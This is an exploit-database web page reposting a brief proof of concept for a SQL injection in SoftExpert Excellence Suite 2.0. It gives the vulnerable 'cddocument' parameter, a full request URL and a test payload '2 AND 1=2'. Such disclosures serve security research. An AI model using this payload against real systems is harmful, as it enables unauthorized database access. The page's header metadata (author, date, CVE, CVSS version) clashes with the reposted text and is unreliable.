Advertisement






SoftExpert Excellence Suite 2.0 SQL Injection

CVE Category Price Severity
CVE-2020-26148 CWE-89 $5,000 Critical
Author Risk Exploitation Type Date
Kishan Lal High Remote 2018-07-05
CPE
cpe:cpe:/a:softexpert:excellence_suite:2.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0231 0.56318

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070054

Below is a copy:

SoftExpert Excellence Suite 2.0 SQL Injection
# Exploit Title: SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection
# Author: Seren PORSUK
# Date: 2018-06-28
# Type: webapps
# Platform: PHP
# CVE= N/A
# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/
 
# DETAILS
# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0
# allows remote authenticated users to perform SQL heuristics by pulling
# information from the database with the "cddocument" parameter  in the
# "Downloading Electronic Documents" section.
 
# Vulnerable Parameter Type : GET
# Vulnerable Parameter : cddocument
 
#Vulnerable URL : 
http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853
 
#SQLi Parameter : 2  AND 1=2

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum